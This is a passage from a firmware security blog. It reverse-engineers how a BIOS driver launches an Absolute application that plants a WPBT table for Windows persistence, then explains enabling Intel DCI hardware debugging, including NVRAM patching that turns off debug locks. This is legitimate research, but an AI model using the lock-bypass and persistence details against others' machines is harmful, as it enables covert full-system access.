further into the BIOS.<o:p></o:p></p><p class="MsoNormal"><o:p></o:p></p><h2 style="text-align: left;">Tracking inter-module dependencies</h2><div><p class="MsoNormal">We now understand how the module installs an auto-startup mechanism for Windows, but how does 821ACA26-29EA-4993-839F-597FC021708D get
executed? The file is an “Application” that is not automatically loaded by the platform
software. </p></div><p class="MsoNormal"><span face=""Calibri",sans-serif" style="font-size: 11pt; line-height: 107%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: "Yu Mincho"; mso-fareast-language: JA; mso-fareast-theme-font: minor-fareast; mso-hansi-theme-font: minor-latin;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI_RKzkNYVCmrpJwajWlaBd7rdI-Za9snSrPnJLxOxms8BnAIvDjRLQU6WKTwbOMVJ_w-u2PrHvuX0X_m3gKogtHS1TUT207IC3wWmG8ITlexB3_EfzRwANJHw5i8R-0ndT9-qp_2U7WY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="60" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI_RKzkNYVCmrpJwajWlaBd7rdI-Za9snSrPnJLxOxms8BnAIvDjRLQU6WKTwbOMVJ_w-u2PrHvuX0X_m3gKogtHS1TUT207IC3wWmG8ITlexB3_EfzRwANJHw5i8R-0ndT9-qp_2U7WY/s16000/image.png" /></a></div><p></p><p class="MsoNormal">The short answer: another module starts it. <o:p></o:p></p><p class="MsoNormal">Finding the parent module requires UEFI specific knowledge that starting
an application in the firmware image is done with the following steps: <o:p></o:p></p><p class="MsoNormal"></p><ol style="text-align: left;"><li>Locating the application file via GUID through EFI_LOADED_IMAGE_PROTOCOL</li><li>Calling LoadImage() and StartImage()</li></ol><o:p></o:p><p></p><p class="MsoNormal">
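Since step 1 identifies the application by its GUID, the GUID has to be stored somewhere in the parent module. When searching raw bytes for it, note that the textual form does not match the in-memory form. Assuming the standard EFI_GUID layout (a 32-bit field and two 16-bit fields stored little-endian, followed by eight bytes in order), the bytes can be derived as sketched here. The function name guid_text_to_bytes is hypothetical.</p>

```c
#include <stdint.h>
#include <string.h>

/* Converts one hexadecimal digit to its value, or returns -1. */
static int hex_value(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Converts "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" into the 16 bytes of
   the assumed in-memory EFI_GUID layout. Returns 0 on success, -1 on
   malformed input. */
int guid_text_to_bytes(const char *text, uint8_t out[16])
{
    /* Index in `text` of the first hex digit of each output byte. The
       first three fields are little-endian, so their bytes are reversed;
       the last eight bytes keep their textual order. */
    static const int position[16] = {
        6, 4, 2, 0,             /* Data1 (32-bit) */
        11, 9,                  /* Data2 (16-bit) */
        16, 14,                 /* Data3 (16-bit) */
        19, 21,                 /* Data4[0..1] */
        24, 26, 28, 30, 32, 34  /* Data4[2..7] */
    };

    if (strlen(text) != 36) {
        return -1;
    }
    if (text[8] != '-' || text[13] != '-' || text[18] != '-' || text[23] != '-') {
        return -1;
    }
    for (int i = 0; i < 16; i++) {
        int high = hex_value(text[position[i]]);
        int low = hex_value(text[position[i] + 1]);
        if (high < 0 || low < 0) {
            return -1;
        }
        out[i] = (uint8_t)(high * 16 + low);
    }
    return 0;
}
```

<p class="MsoNormal">For 821ACA26-29EA-4993-839F-597FC021708D, this yields the byte sequence 26 CA 1A 82 EA 29 93 49 83 9F 59 7F C0 21 70 8D.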
</p><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal"><a href="https://edk2-docs.gitbook.io/edk-ii-uefi-driver-writer-s-guide/5_uefi_services/readme.2/524_loadimage_and_startimage">EDK2's UEFI Driver Writer's Guide</a> shows example code that looks about like this:</p><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div>MEDIA_FW_VOL_FILEPATH_DEVICE_PATH devicePath;</div><div>devicePath.Header = <span style="color: #6a9955;">/* ... */</span></div><div>devicePath.FvFileName = FileGuid; <span style="color: #6a9955;">// GUID of the file to launch</span></div><div><span style="color: #6a9955;">// Open the loaded image protocol</span></div><div><span style="color: #9cdcfe;">gBS</span>-><span style="color: #dcdcaa;">OpenProtocol</span>(..., &<span style="color: #9cdcfe;">EFI_LOADED_IMAGE_PROTOCOL_GUID</span>, &<span style="color: #9cdcfe;">devicePathInterface</span>, ...);</div><div><span style="color: #6a9955;">// Resolve the path in the firmware volume</span></div><div>path = <span style="color: #dcdcaa;">AppendDevicePathNode</span>(devicePathInterface, &devicePath.Header);</div><div><span style="color: #6a9955;">// Start the file</span></div><div><span style="color: #9cdcfe;">gBS</span>-><span style="color: #dcdcaa;">LoadImage</span>(..., path, ..., &<span style="color: #9cdcfe;">NewImageHandle</span>);</div><div><span style="color: #9cdcfe;">gBS</span>-><span style="color: #dcdcaa;">StartImage</span>(NewImageHandle, ...);</div></div><p class="MsoNormal">With this knowledge, we can search the GUID of the
application (821ACA26-29EA-4993-839F-597FC021708D) and locate the parent module. </p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYYRFR_MDsAsDXDT7A7sBs3oAZy8hSyrXpyIAv3EbTFGfNSSrCtZzJB8WN7C3uMoN3uV6eEd0M63bIz0jbj5lp5g62rHsZx7LtpWJ5e8GHHPjAJQzMB8ikRfuiQTKFyZYZ7WMinqRVJgw/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="104" data-original-width="624" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYYRFR_MDsAsDXDT7A7sBs3oAZy8hSyrXpyIAv3EbTFGfNSSrCtZzJB8WN7C3uMoN3uV6eEd0M63bIz0jbj5lp5g62rHsZx7LtpWJ5e8GHHPjAJQzMB8ikRfuiQTKFyZYZ7WMinqRVJgw/w640-h106/image.png" width="640" /></a></div></div></div><div class="separator" style="clear: both; text-align: center;"><p class="MsoNormal" style="text-align: left;">As shown above, the module 8B778A74-C275-49D5-93ED-4D709A129CB1 is found. It is a DXE driver, meaning it is executed automatically by the platform software.
Note that this module does not have a name in our image, but other images name
it AbtDxe and DellAbtDxeBin.<o:p></o:p></p></div><p class="MsoNormal">Open this module with Ghidra and search for the GUID through
memory search. We can find the GUID at 0x800050e0 as shown below.<o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-HTNcqBxxPrKJGvQUztve9p_qSyu8ju7u-OgbiSk3gm3SgiRHzoFb3-0Aq7qf9bbr2LDP4pmmrGHIXDafTDcj7RkP2Enlb0Ls8yThedQjZ3LkjGDCHgZH_H0MSa4-HQcyTlHC99Pn4k4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="442" data-original-width="1118" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-HTNcqBxxPrKJGvQUztve9p_qSyu8ju7u-OgbiSk3gm3SgiRHzoFb3-0Aq7qf9bbr2LDP4pmmrGHIXDafTDcj7RkP2Enlb0Ls8yThedQjZ3LkjGDCHgZH_H0MSa4-HQcyTlHC99Pn4k4/w640-h253/image.png" width="640" /></a></div></div><br />By cross-referencing 0x800050e0, we can find the function using the GUID and calling StartImage().</div><div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhISvx0-NLGgTyha0MZItWg3Vvd5fEs0XKI6KATlboCTSwMQ-mqewIRrT74eQkGMT1o42-QttoEGlULXu49We2ApuenF35_zeoXDs4QgNyC-jcKfhBJMg_ntvooNcS-MffJtK2Sz6-nbPk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="279" data-original-width="501" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhISvx0-NLGgTyha0MZItWg3Vvd5fEs0XKI6KATlboCTSwMQ-mqewIRrT74eQkGMT1o42-QttoEGlULXu49We2ApuenF35_zeoXDs4QgNyC-jcKfhBJMg_ntvooNcS-MffJtK2Sz6-nbPk/s16000/image.png" /></a></div><p class="MsoNormal">As we inspect the FUN_80002fe8 called above, it becomes obvious that the function calls LoadImage() with the GUID as input, and then, StartImage() is called, which launches the application.<o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWBcfm36o8KKsyBE-rdLm50Y2ILB5tTvyKgfMEe1MedYxQ1Z6UPtoSSuhFN89MFrzoiCtDc86D641H-eitrjewqWYEx2ya16MEnUZnOpI9EBzT7YVXAYJ2kJDvTLS6FAg19iz3gnpoJHc/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="623" data-original-width="613" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWBcfm36o8KKsyBE-rdLm50Y2ILB5tTvyKgfMEe1MedYxQ1Z6UPtoSSuhFN89MFrzoiCtDc86D641H-eitrjewqWYEx2ya16MEnUZnOpI9EBzT7YVXAYJ2kJDvTLS6FAg19iz3gnpoJHc/s16000/image.png" /></a></div><p class="MsoNormal">When are those functions called? By cross referencing the
function, we can find that the pointer of the function is passed to the CreateEventEx() with EFI_EVENT_READY_TO_BOOT_GUID. <o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_nEIpziOC_O9k1jJ_zPlpS3Vq4KuShprVUJoYKJi98vR3L5-BjBLp1fqcvdaeSbxgtfbKbaQiAaucnXd41iNY4JnJFFoCsQbfdCyGh-WYbEbV1RqvFx6iLrG9TqKxpHqhm4nO9cZCPmo/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="116" data-original-width="428" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_nEIpziOC_O9k1jJ_zPlpS3Vq4KuShprVUJoYKJi98vR3L5-BjBLp1fqcvdaeSbxgtfbKbaQiAaucnXd41iNY4JnJFFoCsQbfdCyGh-WYbEbV1RqvFx6iLrG9TqKxpHqhm4nO9cZCPmo/s16000/image.png" /></a></div><br />We can make better sense of this with <a href="https://www.blogger.com/#">the UEFI specification (PDF)</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWF1q3P19IbWVFbKMpGUd-W7RBa0gMNaa8fzQTGN1ItHf2HVeDmRrpErXDCw1YxNojOB1k47ciCb0pERfz7gghaTVLwU5V6Xg80MfCqCnYq9EhNxXkrR2BsnZ6X4HBSJDMD5pzwKVWY4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="217" data-original-width="329" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWF1q3P19IbWVFbKMpGUd-W7RBa0gMNaa8fzQTGN1ItHf2HVeDmRrpErXDCw1YxNojOB1k47ciCb0pERfz7gghaTVLwU5V6Xg80MfCqCnYq9EhNxXkrR2BsnZ6X4HBSJDMD5pzwKVWY4/" width="320" /></a><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSWF1q3P19IbWVFbKMpGUd-W7RBa0gMNaa8fzQTGN1ItHf2HVeDmRrpErXDCw1YxNojOB1k47ciCb0pERfz7gghaTVLwU5V6Xg80MfCqCnYq9EhNxXkrR2BsnZ6X4HBSJDMD5pzwKVWY4/" style="margin-left: 1em; margin-right: 1em;"></a><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVBraf-ZEJekukYmHWiFnGpfuB0KtfLZA7tx3WBwQNIY_Dwv0QEl1rTjTFpVUiH1qs36lInG_hbkg9wnqBFt2Ky661_TEiLqrOUFswkKN8q8qRivIVJfUMHe0gvBbipx3Hshso6LCAEb0/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="72" data-original-width="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVBraf-ZEJekukYmHWiFnGpfuB0KtfLZA7tx3WBwQNIY_Dwv0QEl1rTjTFpVUiH1qs36lInG_hbkg9wnqBFt2Ky661_TEiLqrOUFswkKN8q8qRivIVJfUMHe0gvBbipx3Hshso6LCAEb0/s16000/image.png" /></a></div></div><p class="MsoNormal">As highlighted, the function is set as a callback for the
event that is signaled right before the OS boot loader starts. <o:p></o:p></p><p class="MsoNormal">To summarize the flow:<br /></p><ol style="text-align: left;"><li>The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 is loaded by the platform software.</li><li>The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 registers the event notification. </li><li>When the system is about to start the boot loader (eg, bootmgfw.efi and grub.efi), the event is signaled.</li><li>The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 starts the application 821ACA26-29EA-4993-839F-597FC021708D.</li><li>The application 821ACA26-29EA-4993-839F-597FC021708D installs the WPBT ACPI table.</li><li>If Windows is booted, smss.exe creates wpbbin.exe from the table and executes it.</li></ol>This establishes a mechanism to auto-start a Windows application, even if Windows is reinstalled. <p></p><h2 style="text-align: left;">More inter-module interactions</h2><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">An astute reader might notice that we have not looked into how the above flow is activated, or skipped when Absolute is not enabled by the user. Answering this question requires further analysis of UEFI variables and
additional OEM-specific modules.</p><p class="MsoNormal">As for the UEFI variables, Absolute uses a few named Abt* in the a0b1889e-00eb-445b-8ca9-e91ce43c907d namespace. They can easily be found as Unicode strings. </p><p class="MsoNormal"><o:p></o:p></p>
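<p class="MsoNormal">As a rough illustration of how such variable names can be located outside Ghidra, the sketch below scans an extracted module for UTF-16LE strings that start with "Abt". It assumes the names are stored as plain, printable UTF-16LE text, which is how UEFI variable names normally appear; the function name and the sample data are hypothetical and are not taken from the Absolute modules.</p>

```python
import re


def find_utf16_names(blob: bytes, prefix: str = "Abt") -> list[tuple[int, str]]:
    """Return (offset, name) pairs for UTF-16LE strings starting with prefix."""
    # In UTF-16LE, every ASCII character is followed by a zero byte.
    head = b"".join(re.escape(bytes([c])) + b"\x00" for c in prefix.encode("ascii"))
    # After the prefix, accept any run of printable ASCII characters
    # encoded the same way; the run ends at the UTF-16 terminator.
    pattern = re.compile(head + rb"(?:[\x21-\x7e]\x00)*")
    return [(m.start(), m.group().decode("utf-16-le")) for m in pattern.finditer(blob)]


if __name__ == "__main__":
    # Hypothetical sample data standing in for an extracted module body.
    sample = (
        b"\xff\xff"
        + "AbtStatus".encode("utf-16-le") + b"\x00\x00"
        + b"junk"
        + "AbtCfg".encode("utf-16-le") + b"\x00\x00"
    )
    for offset, name in find_utf16_names(sample):
        print(f"0x{offset:x}: {name}")
```

<p class="MsoNormal">The same scan can be pointed at a module body saved from UEFITool. Hits only show where a name is stored; how each variable is used still has to be confirmed in the disassembly.</p>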
<p class="MsoNormal">As for the additional modules, the snippet below indicates that the application
is launched if either:<o:p></o:p></p>
<p class="MsoNormal"></p><ul style="text-align: left;"><li>LocateProtocol() failed, or</li><li>LocateProtocol() succeeded and the bit 0 of the retrieved
data is set </li></ul><o:p></o:p><p></p>
<p class="MsoNormal"><o:p></o:p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwaS-EaSOObBO8Ri-eOfW-rOXgSjUXZ4xBKB9LSTAPpq4sHfLIKc96cJFsCXjQxZzCZNjuHuqpXP-9o4WhxMYQwQKi170XU4wMzcZLhd9Cw5yBShbBZv5F7HR73nfwqYm68G5cPwQyndk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="261" data-original-width="475" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwaS-EaSOObBO8Ri-eOfW-rOXgSjUXZ4xBKB9LSTAPpq4sHfLIKc96cJFsCXjQxZzCZNjuHuqpXP-9o4WhxMYQwQKi170XU4wMzcZLhd9Cw5yBShbBZv5F7HR73nfwqYm68G5cPwQyndk/s16000/image.png" /></a></div><p class="MsoNormal">The first case does not appear to happen. The second case depends
on whether another module that installed the “unknownProtocol_fa02fb02” protocol
sets the bit on its side, meaning that we would have to reverse engineer the
other module to determine the exact condition. <o:p></o:p></p>
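<p class="MsoNormal">The launch condition described above can be restated as a tiny predicate. This is only a model of the two cases, not the decompiled code: the function and parameter names are hypothetical, and the meaning of the bits other than bit 0 in the protocol data is unknown.</p>

```python
def should_launch(locate_succeeded: bool, protocol_data: int = 0) -> bool:
    """Model of the launch condition described in the text.

    locate_succeeded: whether LocateProtocol() returned success.
    protocol_data:    the value read through the located protocol
                      (only bit 0 is interpreted here).
    """
    # Case 1: LocateProtocol() failed, so the application is launched.
    if not locate_succeeded:
        return True
    # Case 2: LocateProtocol() succeeded and bit 0 of the data is set.
    return bool(protocol_data & 1)


if __name__ == "__main__":
    print(should_launch(False))        # protocol missing
    print(should_launch(True, 0b01))   # protocol present, bit 0 set
    print(should_launch(True, 0b10))   # protocol present, bit 0 clear
```

<p class="MsoNormal">Written this way, it is clear that on systems where the protocol is always installed, the decision rests entirely on the module that produces the data.</p>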
<p class="MsoNormal">One can find the additional module by searching for the protocol GUID
in UEFITool again. These are the modules I found on my laptops:<o:p></o:p></p><p class="MsoNormal"></p><ul style="text-align: left;"><li>0FEBE434-A6AF-4166-BC2F-DE2C5952C87D (DellAbsoluteDxe) in Dell
laptops</li><li>A81DD68E-F878-49FF-8309-798444A9C035 (AbtSmm) in an Acer
laptop</li><li>458034FD-DE82-44F1-8398-6D941F85F473 and 22E6FAB5-A6C4-4FF6-AE8C-C16939911BCD
in an HP laptop</li></ul><o:p></o:p><p></p>
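<p class="MsoNormal">When searching for a GUID by hand rather than through UEFITool or Ghidra, keep in mind that an EFI_GUID is stored in memory with its first three fields in little-endian byte order, so the bytes do not match the textual form. The sketch below converts a GUID string into that layout and lists every offset where it occurs. It assumes the data being searched is already uncompressed (for example, a module body extracted with UEFITool); the function names are hypothetical.</p>

```python
import uuid


def guid_to_efi_bytes(guid: str) -> bytes:
    """Convert a textual GUID to the 16-byte in-memory EFI_GUID layout."""
    # bytes_le stores the first three fields little-endian, as EFI_GUID does.
    return uuid.UUID(guid).bytes_le


def find_guid(blob: bytes, guid: str) -> list[int]:
    """Return every offset in blob where the GUID appears."""
    needle = guid_to_efi_bytes(guid)
    offsets = []
    pos = blob.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(needle, pos + 1)
    return offsets


if __name__ == "__main__":
    app_guid = "821ACA26-29EA-4993-839F-597FC021708D"
    print(guid_to_efi_bytes(app_guid).hex(" "))
    # Hypothetical buffer standing in for an extracted, uncompressed module.
    sample = b"\x00" * 8 + guid_to_efi_bytes(app_guid) + b"\x00" * 8
    print([hex(offset) for offset in find_guid(sample, app_guid)])
```

<p class="MsoNormal">A raw search like this will miss GUIDs that sit inside compressed sections, which is one reason to prefer UEFITool's own search on a full image.</p>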
<p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">Analysis of the UEFI variable and OEM-specific modules is left as an exercise for
readers, as they differ across OEMs. </p><h2 style="text-align: left;">Conclusion</h2><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">Through this exercise, we studied:<o:p></o:p></p>
<p class="MsoNormal"></p><ul style="text-align: left;"><li>How a BIOS image file can be extracted </li><li>How modules with tight dependency on Windows can be located </li><li>How the WPBT ACPI table may be used to establish persistence
on Windows</li><li>How events can be used for deferred execution </li><li>How dependent modules may be located in the BIOS image</li><li>Using only freely available, cross-platform software </li></ul><o:p></o:p><p></p>
<p class="MsoNormal">Hopefully, you found reverse engineering BIOS images interesting and more
approachable than previously you thought. </p><p class="MsoNormal" style="text-align: left;"><o:p></o:p></p><p class="MsoNormal"><o:p></o:p></p><p></p><p class="MsoNormal"><o:p></o:p></p><div></div></div>Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com1tag:blogger.com,1999:blog-2937860723034111347.post-68223931692150051832021-03-29T05:36:00.009-07:002021-03-29T05:50:56.948-07:00Debugging System with DCI and Windbg<p><span style="font-family: inherit;">This post introduces how one can debug the entire system including system management mode (SMM) code with Windbg and </span>Direct Connect Interface (DCI)<span style="font-family: inherit;">. As an example use case, we will debug the exploit of the kernel-to-SMM local privilege escalation vulnerability I reported.</span></p><p>For more details about the vulnerability and its implications, please refer to <a href="https://github.com/tandasat/SmmExploit">the GitHub repository</a>. This post focuses on DCI and Windbg.</p><h2 style="text-align: left;"><span style="font-family: inherit;">Summary</span></h2><div><span style="font-family: inherit;">DCI is a stealthy, accessible and very powerful technology for kernel/firmware debugging and reverse engineering, and Intel Debug Extensions for WinDbg lets us use it through Windbg's already-familiar commands and GUI. This can speed up your security research.</span></div><h2 style="text-align: left;">What is Direct Connect Interface?</h2><p>Direct Connect Interface (DCI) is the Intel hardware provided debugging interface. It allows developers to debug the whole system without depending on a software provided debugging mechanism, such as Windows' kernel debugging subsystem and firmware (EDK2)'s Debug Agent. </p><p>As DCI is implemented by hardware, the debugger using this interface is capable of debugging a greater range of code including the reset vector and one that runs on the system management mode (SMM). 
This makes DCI an attractive tool for both developing and reverse engineering firmware, for example. </p><p>For a more comprehensive overview of the DCI technology, I strongly recommend taking time to watch the video from Intel and reading a document by the Slim Bootloader team: </p><p></p><ul style="text-align: left;"><li><a href="https://software.intel.com/content/www/us/en/develop/videos/introduction-of-system-debug-and-trace-in-intel-system-studio-2018.html">Introduction of System Debug and Trace in Intel® System Studio 2018</a></li><li><a href="https://slimbootloader.github.io/developer-guides/debugging-with-cca.html">Source Level Debugging with Intel(R) SVT CCA</a></li></ul><p></p><h2 style="text-align: left;">Does my system support DCI? </h2><p>DCI is available on Skylake (6th gen) or later and some of Atom and Xeon models. However, older generations support only a connection type called DCI OOB and require an expensive adapter, as shown in the below table. </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn4GTKtuaGtJETMBhQ01lD2KDGENGyabjpXz5LFnMdVlG1o5BP16esBjVS07ntcGcl1aILhSySHmXa8VPVM1JCZxGUywfS-xHrAe_Bg77k8QF6i0AtPZnqE5gPVBicstrAuhXdVOEa6gY/s1373/Untitled.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="238" data-original-width="1373" height="69" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn4GTKtuaGtJETMBhQ01lD2KDGENGyabjpXz5LFnMdVlG1o5BP16esBjVS07ntcGcl1aILhSySHmXa8VPVM1JCZxGUywfS-xHrAe_Bg77k8QF6i0AtPZnqE5gPVBicstrAuhXdVOEa6gY/w401-h69/Untitled.png" width="401" /></a></div><p style="text-align: left;">If your <u>target system</u> is 7th gen or newer, DCI DbC is supported, and all you need to buy is a USB cable without the VBus. 
Buy <a href="https://www.mouser.ca/ProductDetail/Intel/ITPDCIAMAM1M/?qs=%2Fha2pyFaduhPSyNa3fmz2l6GBhukNAU2JZ0iVal5h9Gx1DmpZe2dNg%3D%3D">ITPDCIAMAM1M</a> or <a href="https://www.datapro.net/products/usb-3-0-super-speed-a-a-debugging-cable.html">DataPro's one</a> if the target system has the type-A USB port, or <a href="https://www.mouser.ca/ProductDetail/Intel/ITPDCIAMCM1M/?qs=qSfuJ%252Bfl%2Fd7ZnYa8%2FOX23w%3D%3D">ITPDCIAMCM1M</a> for the type-C USB port. I suggest buying both since I had a device that only worked with the type-C port. </p><p style="text-align: left;">If your target system is 6th gen, DbC is not supported, and you need to buy an expensive adapter called CCA (<a href="https://www.mouser.ca/ProductDetail/Intel/EXIBSSBADAPTOR/?qs=%2Fha2pyFaduh20SJk2oUOfx1pP3lhHLWrr6c1ZbRk%252BvBoB%2Fw7C9HcNg%3D%3D">EXIBSSBADAPTOR</a>). It is expensive but allows you to debug code even from the reset vector, which is not supported by DbC.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGCDfoS0NFwFtojd8DipD0eKIwK4AJJEWoSja9hxAVqnqitKlAHV5H_exhF0zc0PCnzHpS2QyT7Nonc_AncE7KVU5FnV12DjcehErTzQcTgVsOb_l8vsnQy1M9u9c-3lUfW2QutYpzNiU/s2728/Untitled.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="555" data-original-width="2728" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGCDfoS0NFwFtojd8DipD0eKIwK4AJJEWoSja9hxAVqnqitKlAHV5H_exhF0zc0PCnzHpS2QyT7Nonc_AncE7KVU5FnV12DjcehErTzQcTgVsOb_l8vsnQy1M9u9c-3lUfW2QutYpzNiU/w640-h130/Untitled.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">DCI connection types <br />(from <a href="https://2019.osfc.io/talks/debugging-intel-firmware-using-dci-usb-3-0.html">Debugging Intel Firmware using DCI & USB 3.0</a> by 
Intel)</td></tr></tbody></table><div><p style="text-align: left;">There is no notable requirement for the host system, and one can use a USB-C-to-A adapter if needed.</p><p style="text-align: left;">The complete list of supported models can be found in <a href="https://software.intel.com/content/www/us/en/develop/articles/intel-system-debugger-release-notes.html">the release notes of Intel System Debugger</a>, which we will be looking at shortly. </p><h2 style="text-align: left;">Is DCI enabled on the target?</h2></div><p style="text-align: left;">If IA32_DEBUG_INTERFACE[0] is set, DCI is enabled. Use a kernel debugger or <a href="http://rweverything.com/">RWEverything</a> to check this. For obvious reasons, DCI should be disabled by default on systems in the market. If not, report it to the OEM. It is a vulnerability (see <a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00127.html">CVE-2018-3652</a>). </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVo0ztcWHtQARFt5NwOuERk2Mk21IGDGBvS5RHtFQJpFUonjDmKzqjkxIRpaCy_8P2e_-Uk8eBcU6x3vLyUKfx5XdMPGl1UEAkDRWMtYhDt2tVzHNI1kVChC335mUhAOxzOd7oRYdJCFM/s907/Screenshot+2021-01-21+203340.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="201" data-original-width="907" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVo0ztcWHtQARFt5NwOuERk2Mk21IGDGBvS5RHtFQJpFUonjDmKzqjkxIRpaCy_8P2e_-Uk8eBcU6x3vLyUKfx5XdMPGl1UEAkDRWMtYhDt2tVzHNI1kVChC335mUhAOxzOd7oRYdJCFM/w640-h142/Screenshot+2021-01-21+203340.jpg" width="640" /></a></div><h2 style="text-align: left;">How can I enable DCI? </h2><p style="text-align: left;">There is a couple of ways to do this: changing BIOS settings or patching NVRAM with RU.efi</p><p></p><h3 style="text-align: left;">BIOS settings </h3><p style="text-align: left;">Very occasionally, BIOS settings offer an option to enable DCI. 
I have seen a couple of configuration names for this purpose as listed below. Enable them if available. </p><p style="text-align: left;"></p><ul style="text-align: left;"><li>CPU Run Control</li><li>Enable HDCIEN</li></ul><div>I had a case where the configuration was available but had no effect on IA32_DEBUG_INTERFACE. </div><p></p><h3 style="text-align: left;">Patching NVRAM with RU.efi</h3><p style="text-align: left;">The BIOS settings for DCI are often hidden on production systems, but one can achieve the same effect as changing them by overwriting the NVRAM that stores the setting values. This process is a bit involved but is explained in the multiple articles listed below. Here are the highlights of the steps.</p><p style="text-align: left;"></p><ol style="text-align: left;"><li>Extract BIOS using software like <a href="https://github.com/chipsec/chipsec">Chipsec</a></li><li>Extract a module 899407D7-99FE-43D8-9A21-79EC328CAC21 ("Setup") with <a href="https://github.com/LongSoft/UEFITool">UEFITool</a></li><li>Extract a human-readable representation of the BIOS menu implementation with <a href="https://github.com/LongSoft/Universal-IFR-Extractor">IFR Extractor</a></li><li>Find offsets of the following setting names and the value to set, as denoted with =></li></ol><ul style="text-align: left;"><ul><li>Debug Interface => Enabled (1)</li><li>Debug Interface Lock => Disabled (0)</li><li>DCI enable (HDCIEN) => Enabled (1)</li><li>Platform Debug Consent => Enabled (DCI OOB+[DbC]) (1)</li><li>CPU Run Control => Enabled (1)</li><li>CPU Run Control Lock => Disabled (0)</li><li>PCH Trace Hub Enable Mode => Host Debugger (2)<br />(Not all of them may be found; it depends on the BIOS.) </li></ul></ul><ol style="text-align: left;"><li>Download <a href="https://ruexe.blogspot.com/">RU.efi</a>, boot the system into UEFI shell and start RU.efi</li><li>Press Alt+=, select "Setup", and change the values at the offsets found. 
